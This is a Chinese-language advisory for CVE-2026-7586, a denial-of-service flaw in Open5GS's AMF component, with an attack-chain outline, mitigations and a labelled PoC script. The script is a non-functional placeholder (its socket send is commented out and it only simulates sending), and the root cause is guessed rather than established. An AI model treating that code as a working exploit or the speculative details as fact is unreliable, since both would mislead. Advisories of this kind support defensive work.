CVE-2026-7586 Open5GS AMF组件拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-7586

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS是一款开源的5G核心网实现。在Open5GS 2.7.7及之前版本中，AMF组件的`nudm-handler.c`文件内的`ogs_id_get_value`函数存在一个安全弱点。由于对特定输入数据的处理逻辑存在缺陷，攻击者可以通过网络远程发起攻击，无需用户交互且仅需低权限即可触发该漏洞。该漏洞会导致目标服务崩溃，造成拒绝服务。目前漏洞利用代码已被公开，但官方尚未发布修复补丁。

技术细节

该漏洞位于Open5GS的接入和移动性管理功能（AMF）组件中，具体涉及`/src/amf/nudm-handler.c`文件中的`ogs_id_get_value`函数。该函数主要负责处理与统一数据管理（UDM）交互时的标识符解析。由于缺乏对特定边界条件或异常格式的充分校验，攻击者可以构造恶意的网络数据包进行远程操纵。当AMF组件解析这些经过特殊构造的数据时，`ogs_id_get_value`函数可能会发生逻辑错误（如空指针引用、缓冲区越界或无限循环）。攻击复杂度低（AC:L），且无需用户交互（UI:N）。成功利用后，将导致AMF进程异常终止，使核心网无法处理终端的接入请求，从而严重影响网络服务的可用性（A:L）。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出暴露在互联网上的Open5GS AMF组件（通常运行在特定SCTP端口）。

STEP 2

准备

攻击者获取低权限网络访问权限（PR:L），无需目标用户交互。

STEP 3

利用

攻击者向AMF组件的`nudm-handler.c`处理接口发送特制的数据包，该数据包包含旨在触发`ogs_id_get_value`逻辑错误的恶意ID值。

STEP 4

影响

AMF进程在解析恶意数据时崩溃，导致5G核心网无法处理新设备的接入请求，实现拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2026-7586 (Open5GS DoS)
This script attempts to trigger the vulnerability in the ogs_id_get_value function.
Note: Actual exploitation requires specific 5G signaling context (SCTP/NGAP).
"""
import socket
import time

TARGET_IP = "127.0.0.1"  # Replace with target AMF IP
TARGET_PORT = 38412      # Standard SCTP port for NGAP (Conceptual)

# This is a conceptual representation.
# Real exploitation requires crafting NGAP messages over SCTP.
# The vulnerability is triggered by manipulating ID values sent to the handler.

def send_malicious_payload():
    print(f"[*] Targeting {TARGET_IP} on port {TARGET_PORT}...")
    print("[*] Attempting to trigger ogs_id_get_value malfunction...")
    
    try:
        # In a real scenario, establish an SCTP association
        # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # s.connect((TARGET_IP, TARGET_PORT))
        
        # Construct payload that triggers the parsing weakness
        # The exact byte sequence depends on the specific ID parsing logic flaw.
        # Assuming a malformed length or delimiter causes the crash.
        malformed_header = b'\x00\x00\x00\x01' 
        trigger_body = b'A' * 256  # Buffer that might overflow or confuse the parser
        payload = malformed_header + trigger_body
        
        # s.send(payload)
        print("[!] Malicious payload sent (simulated).")
        print("[!] Check AMF process status for potential crash.")
        
        # s.close()
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    send_malicious_payload()

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于官方尚未发布修复补丁，建议采取网络隔离措施，将AMF部署在内网并严格限制访问源。同时，建议在边界设备上部署入侵检测系统（IDS）以识别异常的流量模式，并确保系统日志开启以便事后分析。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7586
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7586
3 Details https://www.cvedetails.com/cve/CVE-2026-7586/
4 VulDB https://vuldb.com/cve/CVE-2026-7586
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4405
7 Link https://vuldb.com/submit/804336
8 Link https://vuldb.com/vuln/360536
9 Link https://vuldb.com/vuln/360536/cti